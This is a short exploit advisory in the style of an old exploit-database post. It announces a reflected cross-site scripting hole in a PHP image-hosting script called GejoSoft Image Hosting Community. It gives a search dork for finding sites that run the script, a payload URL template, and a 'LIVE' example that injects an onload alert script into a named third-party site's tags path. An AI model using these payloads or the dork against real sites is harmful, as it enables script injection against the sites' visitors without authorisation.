#-----------------------------I AM MUSLIM !!------------------------------#

                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|

        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
        [»] GejoSoft Image Hosting Community Remote XSS Vulnerabilities

	[»] Script:             [ GejoSoft Image Hosting Community ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.gejosoft.com/ ]
	[&#187;] Founder:            [ Moudi <m0udi@9.cn> ]
        [&#187;] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [&#187;] Team:               [ EvilWay ]
        [&#187;] Dork:               [ Powered By GejoSoft ]
        [&#187;] Price:              [ $199 ]
        [&#187;] Site :              [ https://security-shell.ws/forum.php ]


===[ Exploit XSS + LIVE : vulnerability ]===

[&#187;] http://www.site.com/patch/tags/1[XSS]

[&#187;] http://www.fociki.com/photos/tags/1<body+onload=alert(323052257059)>

Author: Moudi
